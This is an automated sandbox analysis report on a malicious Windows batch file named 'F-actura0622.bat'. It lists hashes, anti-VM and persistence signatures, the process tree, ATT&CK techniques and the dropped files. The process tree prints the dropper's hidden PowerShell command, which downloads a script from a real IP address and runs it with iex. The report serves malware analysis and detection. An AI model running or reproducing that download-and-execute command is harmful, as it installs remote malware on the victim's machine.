Overview

overview

10

Static

static

F-actura0622.bat

windows7_x64

10

F-actura0622.bat

windows10-2004_x64

10

Analysis

  • max time kernel
    961s
  • max time network
    963s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    22-06-2022 20:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    F-actura0622.bat

  • Size

    1KB

  • MD5

    6cef8304265178796921535f0a2e9c03

  • SHA1

    07275c43ac049126b967325baf984e3def7af1ed

  • SHA256

    db9c0fd3a144ea0a24d8d65841ae94f7336ed420428dd455ed4b27ac081949c5

  • SHA512

    1a2fa8832ed844fad8b704754f929df1ed71931f043571f3c0d9e6025ff821b0169c028f15062df10bb350668522e9f17af14a1dd81283c5222b01af974157f3

Score
10/10
evasionpersistencethemidatrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://20.91.202.137//?a=Z0DEXUBSWD7FE45T3JHBMMJXCW3DON98P9LY3SRT

Signatures

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
    evasion
  • Blocklisted process makes network request 3 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 2 IoCs
  • Themida packer 11 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
    adwarespyware
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 43 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\F-actura0622.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:948
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c chcp
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2920
      • C:\Windows\system32\chcp.com
        chcp
        3⤵
          PID:1904
      • C:\Windows\system32\chcp.com
        chcp 708
        2⤵
          PID:4072
        • C:\Windows\system32\cmd.exe
          cmd /c ""C:\Users\Admin\AppData\Local\Temp\F-actura0622.bat" "
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:712
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep Bypass -nop -noexit -windowstyle hidden "(new-object net.webclient).DownloadString('http://20.91.202.137//?a=Z0DEXUBSWD7FE45T3JHBMMJXCW3DON98P9LY3SRT') | iex"
            3⤵
            • Blocklisted process makes network request
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:2316
            • C:\Windows\System32\Wbem\WMIC.exe
              "C:\Windows\System32\Wbem\WMIC.exe" /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct GET displayName /Format:List
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:4520
            • C:\ProgramData\boACkwMt\naK.exe
              "C:\ProgramData\boACkwMt\naK.exe" "C:\ProgramData\boACkwMt\odJ"
              4⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Loads dropped DLL
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Modifies Internet Explorer settings
              • Suspicious behavior: AddClipboardFormatListener
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:4676

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Initial Access

      Execution

      Persistence

      Registry Run Keys / Startup Folder

      1
      T1060

      Privilege Escalation

      Defense Evasion

      Virtualization/Sandbox Evasion

      1
      T1497

      Modify Registry

      2
      T1112

      Credential Access

      Discovery

      Query Registry

      2
      T1012

      Virtualization/Sandbox Evasion

      1
      T1497

      System Information Discovery

      2
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ProgramData\boACkwMt\gcpfqzsczq.dop
        Filesize

        6.8MB

        MD5

        cb0e540176159268be4986459091576a

        SHA1

        c512c14e8a2afb15636e7b4c6f30284646b8d456

        SHA256

        fbe44a3401b91f4fa23f2df40e6844931bfc1e8931fefcf301b786788b44a6f4

        SHA512

        a04fc5b10b46bd2cec4ce3ec48b29ca87e3137a3f5e2d3575d18a6282c98a6c9e9e7c9316494fbeb1a4e30ce24842d41c074c3d4c3c122e0378f8259b25a4b1a

        Download Submit
      • C:\ProgramData\boACkwMt\gcpfqzsczq.dop
        Filesize

        6.8MB

        MD5

        cb0e540176159268be4986459091576a

        SHA1

        c512c14e8a2afb15636e7b4c6f30284646b8d456

        SHA256

        fbe44a3401b91f4fa23f2df40e6844931bfc1e8931fefcf301b786788b44a6f4

        SHA512

        a04fc5b10b46bd2cec4ce3ec48b29ca87e3137a3f5e2d3575d18a6282c98a6c9e9e7c9316494fbeb1a4e30ce24842d41c074c3d4c3c122e0378f8259b25a4b1a

        Download Submit
      • C:\ProgramData\boACkwMt\gcpfqzsczq.dop
        Filesize

        6.8MB

        MD5

        cb0e540176159268be4986459091576a

        SHA1

        c512c14e8a2afb15636e7b4c6f30284646b8d456

        SHA256

        fbe44a3401b91f4fa23f2df40e6844931bfc1e8931fefcf301b786788b44a6f4

        SHA512

        a04fc5b10b46bd2cec4ce3ec48b29ca87e3137a3f5e2d3575d18a6282c98a6c9e9e7c9316494fbeb1a4e30ce24842d41c074c3d4c3c122e0378f8259b25a4b1a

        Download Submit
      • C:\ProgramData\boACkwMt\naK.exe
        Filesize

        884KB

        MD5

        4685811c853ceaebc991c3a8406694bf

        SHA1

        9cd382eb91bfea5782dd09f589a31b47c2c2b53e

        SHA256

        3242e0a736ef8ac90430a9f272ff30a81e2afc146fcb84a25c6e56e8192791e4

        SHA512

        a504fbca674f15d8964ebc6fac11d9431d700ca22736c00d5bb1e51551b0d2b9e4b2b6824bdf1a778111a0ba8d2601eada2f726b9ec7a9cfa5a53fd43c235b46

        Download Submit
      • C:\ProgramData\boACkwMt\naK.exe
        Filesize

        884KB

        MD5

        4685811c853ceaebc991c3a8406694bf

        SHA1

        9cd382eb91bfea5782dd09f589a31b47c2c2b53e

        SHA256

        3242e0a736ef8ac90430a9f272ff30a81e2afc146fcb84a25c6e56e8192791e4

        SHA512

        a504fbca674f15d8964ebc6fac11d9431d700ca22736c00d5bb1e51551b0d2b9e4b2b6824bdf1a778111a0ba8d2601eada2f726b9ec7a9cfa5a53fd43c235b46

        Download Submit
      • C:\ProgramData\boACkwMt\odJ
        Filesize

        178B

        MD5

        2c2d7336ea1206702663cfb74b74d0b9

        SHA1

        e5f610f63b5762104e7dbc2635b8485f267b96d1

        SHA256

        6589d846120ced6f77bda3b905ef0ff0c14947f31389481d1900a8958a19a49b

        SHA512

        9ae77c606fa3f3275da91954073b1f6b2dbddb4593463f80fc2ad42e4a07d366d353aa4530612470a66a78623f008d4c2134c6ea20a6a796374dc5e27776d024

        Download Submit
      • memory/712-133-0x0000000000000000-mapping.dmp
        Download
      • memory/1904-131-0x0000000000000000-mapping.dmp
        Download
      • memory/2316-137-0x00000236EF4A0000-0x00000236EF4E4000-memory.dmp
        Filesize

        272KB

        Download
      • memory/2316-139-0x00000236F2E20000-0x00000236F35C6000-memory.dmp
        Filesize

        7.6MB

        Download
      • memory/2316-142-0x00000236F11B0000-0x00000236F1226000-memory.dmp
        Filesize

        472KB

        Download
      • memory/2316-143-0x00007FFD52380000-0x00007FFD52E41000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/2316-136-0x00007FFD52380000-0x00007FFD52E41000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/2316-135-0x00000236ECF00000-0x00000236ECF22000-memory.dmp
        Filesize

        136KB

        Download
      • memory/2316-134-0x0000000000000000-mapping.dmp
        Download
      • memory/2920-130-0x0000000000000000-mapping.dmp
        Download
      • memory/4072-132-0x0000000000000000-mapping.dmp
        Download
      • memory/4520-138-0x0000000000000000-mapping.dmp
        Download
      • memory/4676-149-0x0000000004B10000-0x0000000005C07000-memory.dmp
        Filesize

        17.0MB

        Download
      • memory/4676-148-0x0000000077D30000-0x0000000077ED3000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4676-150-0x0000000004B10000-0x0000000005C07000-memory.dmp
        Filesize

        17.0MB

        Download
      • memory/4676-151-0x0000000004B10000-0x0000000005C07000-memory.dmp
        Filesize

        17.0MB

        Download
      • memory/4676-152-0x0000000004B10000-0x0000000005C07000-memory.dmp
        Filesize

        17.0MB

        Download
      • memory/4676-153-0x0000000004B10000-0x0000000005C07000-memory.dmp
        Filesize

        17.0MB

        Download
      • memory/4676-154-0x0000000004B10000-0x0000000005C07000-memory.dmp
        Filesize

        17.0MB

        Download
      • memory/4676-155-0x0000000004B10000-0x0000000005C07000-memory.dmp
        Filesize

        17.0MB

        Download
      • memory/4676-156-0x0000000004B10000-0x0000000005C07000-memory.dmp
        Filesize

        17.0MB

        Download
      • memory/4676-140-0x0000000000000000-mapping.dmp
        Download
      • memory/4676-158-0x0000000077D30000-0x0000000077ED3000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4676-159-0x0000000077D30000-0x0000000077ED3000-memory.dmp
        Filesize

        1.6MB

        Download